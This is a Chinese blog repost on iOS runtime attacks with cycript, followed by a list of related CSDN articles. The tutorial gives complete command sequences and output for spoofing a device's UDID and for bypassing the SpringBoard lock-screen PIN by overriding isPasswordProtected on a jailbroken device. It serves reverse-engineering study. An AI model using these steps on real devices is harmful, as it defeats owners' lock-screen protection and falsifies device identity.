iOS runtime攻击-cycript

最新推荐文章于 2024-09-22 01:06:45 发布
转载 最新推荐文章于 2024-09-22 01:06:45 发布 · 3k 阅读 · 0

原文:
 
iOS runtime攻击,目前流行的有两种方式,一种是 动态链接库注入,通过编写定制的dylib文件与设置 DYLD_INSERT_LIBRARIES环境变量来修改API方法的实现(可参照 Mac hook-DYLD_INSERT_LIBRARIES中的例子 );还有一种方法就是利用objective-c runtime的消息机制的 特性,特别是 objc_msgSend, 来操作应用,其中以cycript这种混合了objective-c与javascript语法的工具为翘楚。接下来介绍一下使用cycript操纵iOS应用运行时的例子。

例子1:伪造UDID(UIDevice类说明

第一步:选择待操作的进程 
danimato-iPod:~ root# cycript -p 8442(可以是进程id,也可以是进程名)

第二步:获得当前设备的UDID 
cy# [[UIDevice currentDevice] uniqueIdentifier];
@"a94b65f9ac84c9d5bb7f377d5122a622ea1addf6"

第三步:替换uniqueIdentifier实现方法的实现 
cy# UIDevice.messages['uniqueIdentifier'] = function(){ return @"tanjiti";}
function () {return Instance.box("tanjiti");}

第四步:检查替换后的UDID获取结果 
cy# [[UIDevice currentDevice] uniqueIdentifier];
@"tanjiti"

例子2: 解锁屏幕锁定PIN(SpringBoard/SBAwayController.h说明)

第一步: 选择待操作的进程 
danimato-iPod:~ root# cycript -p SpringBoard
第二步:检查设备是否开启了密码锁定功能(1表示锁定,0表示解锁) 
cy# [SBAwayController.sharedAwayController isPasswordProtected]
1
第三步:替换isPasswordProtected实现方法 
cy# SBAwayController.messages['isPasswordProtected']=function(){return NO;}
function () {return NO;}
第四步:检查替换后设备的锁定状态 (1表示锁定,0表示解锁) 
cy# [SBAwayController.sharedAwayController isPasswordProtected]
0
第五步:最后调用unlockWithSound方法来访问home屏幕 
cy# [SBAwayController.sharedAwayController unlockWithSound:1]
通过以上操作,成功解锁屏幕锁定

接下来会写一下runtime attack中的核心组件MobileSubstrate,与非常流行的Theos越狱开发框架。

参考:
http://iphonedevwiki.net/index.php/Cycript
http://iphonedevwiki.net/index.php/Cycript_Tricks

 

TIB
关注
专栏目录
iOS逆向之分析工具的安装和使用
╰つ栺尖篴夢ゞ
02-03 5万+
一、逆向 App 总体思路 UI 分析:Cycript 、Reveal; 代码分析: 代码在 Mach-O 文件,所以要对 Mach-O 文件进行静态分析; MachOView、class-dump、Hopper Disassember、ida; 动态调试: 对运行中 App 进行代码调试; debugserver、LLDB; 代码编写: 注入代码到 App 中; 必要时还可能需要重新签名、打包 ipa。 二、MonkeyDev 安装与使用 ① 安装 M
runtime(2) - 方法欺骗
swel的博客
03-08 209
方法欺骗是指在运行时候动态的交换所调用的方法。 1、原理 2、代码实现
运行时 #import <objc/runtime.h>
qq_33030123的博客
11-25 1206
一.实现runtime字典转模型  1.定义字典   2.定义模型属性  3.定义个长整型来接受模型的属性的个数 count  4.定义属性列表ivar  5.for循环遍历进行给模型属性赋值  6.转换成OC字符串  7. 截取字符串从第一个字符串 开始截取  8.进行KVC给模型赋值    //遍历属性 ,     //底层 runtime        
iOS防护入门 - Objective-C防止调试器对程序进行调试
05-28 634
iOS防护入门 - Objective-C防止调试器对程序进行调试
iOS 逆向编程(十七)Cycript 使用对APP实测
2401_87288988的博客
09-22 791
或者别的属性或得到的对象修改没有效果的时候,可以到页面一步一步排查,可能是你找错对象了。// text = ‘\xef\xbf\xa50.21’ 看后面的 0.21。调整大,因为宽度是固定的,但是貌似他不会自己撑开,所以你需要一个一个的去改。// 搜索微信程序(微信APP需要处于启动状态)// 获取当前控制器,也就是零钱页面这个控制器。可能并不是这个页面的,你会发现你。组件获取出来的列表,也就是这个。如果你改成比较大的数字,还需要将。,可以通过搜索它来找到对应的。// 获取它的所有子控件。
iOS应用安全Part4:使用Cycript进行运行时分析
清枫逸寒
03-28 1114
在本文中,我们将学习如何使用一个名为Cycript的重要工具来分析和修改一个iOS应用程序的运行时,本文中我们以“雅虎天气”iOS应用作为示例App。
iOS执行时工具-cycript
weixin_30484739的博客
06-20 100
cycript是大神saurik开发的一个很强大的工具,能够让开发人员在命令行下和应用交互,在执行时查看和改动应用。它确实能够帮助你破解一些应用,但我认为这个工具主要还是用来学习其它应用的设计(主要是UI的设计及实现)。 这个工具使用了Objective-C和Javascript的混合模式,能够实时的和应用交互甚至改动应用。它的网址请猛戳这里。在官网上能...
iOS 安全-阻止动态调试
u011960171的博客
11-20 1237
// //  main.m #import &lt;UIKit/UIKit.h&gt; #import "AppDelegate.h" /***************************阻止动态调试****************************/ #import &lt;dlfcn.h&gt; #import &lt;sys/types.h&gt; ty...
iOS逆向工具
04-03
最后,`cycript`是由Jay Freeman(Saurik)开发的一款混合JavaScript和Objective-C的脚本语言,它提供了与Objective-C runtime交互的能力。`cycript`可以在运行时动态修改应用的行为,查看对象属性,甚至注入新的...
iOS逆向技术视频教程
11-05
课时02.iOS系统安全机制 课时03.认识越狱设备 课时04.越狱环境配置 课时05.第一章文档总结 课时06.App结构与构建过程 课时07.寻找控件背后的代码 课时08.数据存储 课时09.类与方法 课时10.runtime特性 课时...
iOS逆向 - 应用安全攻防(越狱与非越狱)
Appleteachers的博客
04-13 1276
iOS 逆向篇章目录 : • 1️⃣、RSA加密原理&密码学&HASH • 2️⃣、应用签名原理及重签名 (重签微信应用实战) • 3️⃣、shell 脚本自动重签名与代码注入 • 4️⃣、重签应用调试与代码修改 (Hook) • 5️⃣、Mach-O文件 • 6️⃣、Hook / fishHook 原理与符号表 • 7️⃣、LLDB由浅至深 • 8️⃣、lldb高级篇 Chisel 与 Cycript • 9️⃣、越狱初探 • ????、实战篇-钉钉打卡插件 前言 逆向篇章从前导知识到工具
iOS逆向实践记录-让非6s机型在SpringBoard拥有3DTouch
qq_41597968的博客
05-12 596
首先先给我这困难的语言表达能力道个歉哈,真的尽力了。最近才接触不久的逆向工程,刷夜,爆肝,把《iOS应用逆向工程》这本书的工具,全部看了一遍,并且尝试了一遍,感觉需要点什么。 那就是实践!  最近6s手机出了3DTouch,无奈手中没有这款机型,恰好最近对逆向小有心得,又听说过已经有插件能实现同样的需求,证明确实有可行性,于是开动。根据点击的判断和出现,初步感觉,这应该不需要多少行代码就能搞定,应...
【扫盲】---------什么是Runtime
qq_36069590的博客
10-09 6557
在看到Node.js定义的时候看到的Runtime,不明白是啥,记录一下。 Runtime又叫运行时,是一套底层C语言的API,其为iOS内部的核心之一,我们平时编写的OC代码底层都是基于它来实现的。 Objective-C 是一门动态语言,它会将一些工作放在代码运行时才处理而并非编译时。也就是说,有很多类和成员变量在我们编译的时是不知道的,而在运行时,我们所编写的代码会转换成完整的确定的...
lenz0a89.gsd Lenze E84AYCPM gsd
12-05
lenz0a89.gsd Lenze E84AYCPM gsd
【大厂+2025】500+真题考点合规备考双通!.zip
12-05
【大厂+2025】500+真题考点合规备考双通!.zip
【微服务架构】基于Spring Cloud Alibaba的秒杀系统设计:高并发场景下库存超卖与分布式事务解决方案
12-05
内容概要:本文详细介绍了“秒杀商城”微服务架构的设计与实战全过程,涵盖系统从需求分析、服务拆分、技术选型到核心功能开发、分布式事务处理、容器化部署及监控链路追踪的完整流程。重点解决了高并发场景下的超卖问题,采用Redis预减库存、消息队列削峰、数据库乐观锁等手段保障数据一致性,并通过Nacos实现服务注册发现与配置管理,利用Seata处理跨服务分布式事务,结合RabbitMQ实现异步下单,提升系统吞吐能力。同时,项目支持Docker Compose快速部署和Kubernetes生产级编排,集成Sleuth+Zipkin链路追踪与Prometheus+Grafana监控体系,构建可观测性强的微服务系统。; 适合人群:具备Java基础和Spring Boot开发经验,熟悉微服务基本概念的中高级研发人员,尤其是希望深入理解高并发系统设计、分布式事务、服务治理等核心技术的开发者;适合工作2-5年、有志于转型微服务或提升架构能力的工程师; 使用场景及目标:①学习如何基于Spring Cloud Alibaba构建完整的微服务项目;②掌握秒杀场景下高并发、超卖控制、异步化、削峰填谷等关键技术方案;③实践分布式事务(Seata)、服务熔断降级、链路追踪、统一配置中心等企业级中间件的应用;④完成从本地开发到容器化部署的全流程落地; 阅读建议:建议按照文档提供的七个阶段循序渐进地动手实践,重点关注秒杀流程设计、服务间通信机制、分布式事务实现和系统性能优化部分,结合代码调试与监控工具深入理解各组件协作原理,真正掌握高并发微服务系统的构建能力。
MATLAB基于3D FDTD的微带线馈矩形天线分析[用于模拟超宽带脉冲通过线馈矩形天线的传播,以计算微带结构的回波损耗参数]
最新发布
12-05
MATLAB基于3D FDTD的微带线馈矩形天线分析[用于模拟超宽带脉冲通过线馈矩形天线的传播,以计算微带结构的回波损耗参数]内容概要:本文介绍了基于3D FDTD(时域有限差分)方法在MATLAB平台上对微带线馈电的矩形天线进行分析的技术方案,旨在模拟超宽带脉冲通过该天线结构的传播过程,并重点计算微带结构的回波损耗参数。该方法通过数值仿真手段精确建模电磁波在天线中的传播特性,适用于高频电磁场仿真与天线性能评估,能够有效支持天线设计优化。文中可能涵盖FDTD算法的基本原理、网格划分、边界条件设置、激励源配置及结果后处理等关键环节。; 适合人群:具备电磁场与微波技术基础知识,熟悉MATLAB编程,从事天线设计、射频工程或相关领域研究的研究生、科研人员及工程技术人员。; 使用场景及目标:①开展超宽带天线的设计与性能仿真;②研究微带天线在脉冲激励下的瞬态响应特性;③计算和优化天线的回波损耗(S11参数),提升匹配性能;④教学与科研中用于电磁仿真方法的实践训练。; 阅读建议:建议读者结合FDTD理论基础与MATLAB编程实践,逐步实现仿真流程,重点关注时间步长、空间网格精度和边界条件对仿真结果的影响,并通过对比仿真与实测数据验证模型准确性。
使用PPG估算心率-SpO2的Matlab开发.zip
12-05
使用PPG估算心率_SpO2的Matlab开发.zip
frida-cycript: 开启跨平台应用探索与修改新时代
关于压缩包子文件的文件名称列表中出现的"frida-cycript-master",这个名称很可能是GitHub仓库中主分支的名称。对于想使用frida-cycript的开发者来说,通常需要到GitHub或其他代码托管平台上去找到对应项目的源代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值